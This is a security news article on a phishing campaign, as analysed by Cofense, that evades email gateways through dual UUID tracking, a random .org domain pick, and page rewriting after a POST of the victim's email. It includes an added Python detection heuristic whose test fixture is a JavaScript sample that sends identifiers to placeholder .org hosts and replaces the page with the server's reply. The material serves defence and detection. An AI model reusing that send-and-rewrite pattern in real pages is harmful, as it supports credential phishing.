Phishing Campaign Uses Unique UUIDs to Evade Secure Email Gateways

A sophisticated new phishing attack discovered in early February 2025 is successfully bypassing Secure Email Gateways (SEGs) and evading perimeter defenses through an ingenious combination of random domain selection, dynamic UUID generation, and browser session manipulation.

The attack leverages a highly specialized JavaScript embedded in malicious attachments and spoofed cloud collaboration platforms, making it exceptionally difficult for traditional security tools to detect and block.

Cofense Intelligence has identified this advanced threat as part of an ongoing campaign that represents a significant evolution in credential theft tactics, demanding immediate attention from security professionals and organizations worldwide.

Unlike conventional phishing scripts that rely on redundant domain retries and static redirects, this threat employs three standout tactics that fundamentally change how defenders must approach email security.

Understanding these mechanisms is essential for organizations seeking to bolster their defenses against an increasingly sophisticated threat landscape.

The Dual UUID Deception Strategy

At the heart of this attack lies an unusual dual UUID approach that demonstrates remarkable sophistication.

Analyzing the script shows that it starts by loading jQuery from cdnjs[.]cloudflare[.]com, a legitimate host for popular web libraries; the library is then used to manipulate the page quietly in the background.

A fake Microsoft credential phishing page rendered without a redirect.

The script generates two distinct identifiers: a hardcoded campaign UUID (6fafd0343-d771-4987-a760-25e5b31b44f) that tracks the overall campaign, and a dynamically generated session UUID that monitors individual victims.

This dual-tracking mechanism mimics legitimate application programming interfaces (APIs), enabling threat actors to correlate exfiltrated credentials with specific victims while maintaining campaign-level analytics.

This approach is unprecedented in its ability to provide granular victim tracking while maintaining operational security, suggesting a well-resourced threat actor with advanced technical capabilities.

The hardcoded UUID likely serves as a campaign or target group marker, indicating that this script may be part of a reusable package designed for deployment across multiple phishing campaigns with different spoofed brands.

This modular approach allows attackers to maximize the return on their development investment while adapting to different organizational targets with minimal code modifications.

Rather than employing the traditional multi-domain failover approach common in phishing attacks, this script selects a single random .org domain from a hardcoded list of nine seemingly random, wordless domains.

This unusual tactic significantly reduces network traffic and minimizes the telltale signs that intrusion detection systems typically flag—multiple failed requests to different domains.

By eliminating failover logic, the attacker relies on a single connection per execution, reducing detectability while making the attack appear more like legitimate API traffic.

The deliberate choice to use .org domains over more frequently abused TLDs like .com, .dev, or .xyz reflects a strategic understanding of email security perceptions. The .org domain suffix carries perceived legitimacy and trustworthiness, making it less likely to be blocked by security tools.

This aligns with recent threat intelligence showing that .org domains remain significantly less exploited than their .com counterparts, giving this attack an additional advantage in bypassing traditional reputation-based filtering systems.

Server-Driven Dynamic Deception

The most deceptive aspect of this attack involves dynamic page replacement—the script fundamentally rewrites the entire webpage with server-provided content without changing the URL in the browser’s address bar.

After successfully sending an HTTPS POST request containing the victim’s email address and session UUID, the attacker’s server responds with a specially crafted login form tailored to the victim’s organization.

This technique, which aligns with MITRE ATT&CK framework T1185 (Browser Session Hijacking), maintains victim confidence in the phishing page’s legitimacy while extending the attack’s effectiveness.
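As an added defensive example (not code from the original article or from Cofense), the following Python heuristic scores an HTML attachment for the combination of behaviours described above: jQuery loaded from cdnjs, a hardcoded campaign UUID beside a run-time session UUID, a random pick from a list of .org hostnames, and a POST followed by wholesale replacement of the document. The two samples, their hostnames and their UUIDs are constructed placeholders, not indicators from the campaign.

```python
import re
from typing import NamedTuple

class Indicator(NamedTuple):
    name: str
    weight: int
    pattern: re.Pattern

# Static indicators derived from the behaviours the article describes; the regexes
# are deliberately loose so that small changes in wording do not defeat them.
INDICATORS = [
    # jQuery pulled from cdnjs.cloudflare.com (legitimate, so low weight on its own)
    Indicator("cdnjs_jquery", 1,
              re.compile(r"cdnjs\.cloudflare\.com/ajax/libs/jquery", re.I)),
    # a quoted UUID-shaped literal baked into the script (campaign marker)
    Indicator("hardcoded_uuid", 2, re.compile(
        r"['\"][0-9a-f]{8,}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{11,}['\"]", re.I)),
    # a per-victim UUID minted at run time (Web Crypto or the common v4 template)
    Indicator("dynamic_uuid", 2,
              re.compile(r"randomUUID\s*\(|xxxxxxxx-xxxx-4xxx", re.I)),
    # an array literal of .org hostnames with Math.random used shortly after it
    Indicator("random_org_domain", 3, re.compile(
        r"\[[^\]]*['\"][a-z0-9-]+\.org['\"][^\]]*\][\s\S]{0,200}?Math\.random", re.I)),
    # a POST followed by replacement of the current document without navigation
    Indicator("post_then_rewrite", 3, re.compile(
        r"method\s*:\s*['\"]POST['\"][\s\S]{0,400}?"
        r"(document\.write|documentElement\.innerHTML|document\.open)", re.I)),
]

def scan_attachment(html: str, threshold: int = 6) -> dict:
    """Score an HTML attachment; 'suspicious' once the weighted hits reach threshold."""
    hits = [ind.name for ind in INDICATORS if ind.pattern.search(html)]
    score = sum(ind.weight for ind in INDICATORS if ind.name in hits)
    return {"score": score, "hits": hits,
            "verdict": "suspicious" if score >= threshold else "clean"}

# Constructed test samples: placeholder UUIDs and hostnames, not real indicators.
SUSPICIOUS_SAMPLE = """<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>var campaign = "00000000-0000-4000-8000-000000000000"; var session = crypto.randomUUID();
var hosts = ["example-one.org", "example-two.org"]; var host = hosts[Math.floor(Math.random() * hosts.length)];
fetch("https://" + host + "/api", {method: "POST", body: JSON.stringify({campaign, session})})
  .then(r => r.text()).then(t => { document.open(); document.write(t); });</script>"""

# A legitimate page sharing two low-value indicators (cdnjs jQuery, a client id) should stay clean.
BENIGN_SAMPLE = """<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>var clientId = "11111111-2222-4333-8444-555555555555";
fetch("/api/submit", {method: "POST", body: new FormData(document.forms[0])})
  .then(r => r.json()).then(j => { document.getElementById("status").textContent = j.msg; });</script>"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_attachment(sample))
```

The weights keep any single indicator below the threshold, so only the co-occurrence the article describes triggers a verdict; tune them against a corpus of your own benign HTML attachments before deploying.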

Phishing email using Microsoft OneDrive/SharePoint Online to deliver the malicious URL.

The attack’s delivery vectors include HTML-based email attachments and spoofed links impersonating trusted cloud collaboration platforms such as Microsoft OneDrive, SharePoint Online, DocuSign, Google Docs, and Adobe Sign.

This multi-vector approach ensures broad campaign reach while leveraging brand recognition to maximize victim engagement and credential compromise rates.

Organizations must immediately review their email security controls and implement additional verification mechanisms beyond traditional gateway filtering to defend against this evolving threat.